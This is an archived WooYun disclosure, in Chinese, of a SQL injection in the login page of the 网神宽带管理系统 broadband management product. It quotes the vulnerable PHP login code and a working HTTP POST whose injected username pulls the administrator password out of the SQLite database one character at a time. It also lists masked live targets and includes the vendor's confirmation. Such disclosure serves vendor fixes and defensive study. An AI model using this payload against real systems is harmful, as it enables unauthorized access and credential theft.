当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0195527

漏洞标题:网神宽带管理系统(SQLite注入)

相关厂商:网神信息技术(北京)股份有限公司

漏洞作者: Angle_G

提交时间:2016-04-12 17:25

修复时间:2016-07-14 21:10

公开时间:2016-07-14 21:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-12: 细节已通知厂商并且等待厂商处理中
2016-04-15: 厂商已经确认,细节仅向厂商公开
2016-04-18: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-06-09: 细节向核心白帽子及相关领域专家公开
2016-06-19: 细节向普通白帽子公开
2016-06-29: 细节向实习白帽子公开
2016-07-14: 细节向公众公开

简要描述:

RT, 先前大牛审计过的的:http://www.wooyun.org/bugs/wooyun-2015-0165284

详细说明:

大牛审计过的的:http://**.**.**.**/bugs/wooyun-2015-0165284
下了网神的 网神宽带管理系统 源码,审计一下!基本没什么洞!授权做的都可以!!意外发现登录处!!!
既然用的是" 双引号闭合的!!!代码:
在文件 /login.php

if ($_REQUEST['action'] == 'login') {
$userName = iconv("UTF-8", "gbk", $_POST['userName']);
$password = iconv("UTF-8", "gbk", $_POST['password']);

if (!$userName || !$password) {
echo '{success:false,msg:"用户名或密码不能为空。"}';
return;
}
$DB = new SQLite('/usr/hls/etc/passwd.db');
$result = $DB->Query('select * from passwd where username="'.$userName.'"');
foreach($result as $r) {
if (!ip_allow($userName, $remote_addr)) {
echo '{success:false,msg:"该用户不允许从此IP登录。"}';
return;
}

if (!failure_allow($userName)) {
echo '{success:false,msg:"该用户由于连续错误登录次数过多被锁定,请稍后再试。"}';
return;
}
if ($r['password'] == md5($password) || $r['password'] == $password) {
failure_clear($userName);
} else {
failure_record($userName, $remote_addr);
echo '{success:false,msg:"密码错误,请重新输入。"}';
return;
}


这两句:

$DB = new SQLite('/usr/hls/etc/passwd.db');
$result = $DB->Query('select * from passwd where username="'.$userName.'"');


SQLite数据库!!!! 双引号闭合,所以这里是双引号注入!!!!
得手工,sqlmap是跑不出来的!!(不然还能有,早被提交了!)
直接爆了:

POST /login.php?action=login HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Content-Length: 82
Origin: https://**.**.**.**
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: https://**.**.**.**/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=7d8h8ht0dvicelotlhfu7emtv4
userName=1" or substr((select password from passwd),1,1)<1 or "1"="2&password=1111


上面语句是的得到管理密码的 第一位!!!
证明:
第一位截图:

QQ截图20160412170319.jpg


第二位:

QQ截图20160412170410.jpg


案例:

https://**.**.**.**/
**.**.**.**:8090/
**.**.**.**:4443/
**.**.**.**/
**.**.**.**:1234/

漏洞证明:

如上!

修复方案:

开启gpc

版权声明:转载请注明来源 Angle_G@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2016-04-15 21:01

厂商回复:

感谢白帽子提交的问题。经确认,该情况与2015年12月提出的问题一致,网神已完成了相关问题解决,并提供了相关的更新程序,但考虑到用户的环境和设备数量因素,本次问题属于设备尚未更新所造成。网神会立即通知并跟进相关用户的设备进行更新。!

最新状态:

暂无


漏洞评价:

评价

  1. 2016-04-12 18:20 | 小牛牛 ( 普通白帽子 | Rank:139 漏洞数:17 | 求带)

    前排

  2. 2016-04-16 11:17 | 伤剑 ( 普通白帽子 | Rank:246 漏洞数:102 | extrac)

    前排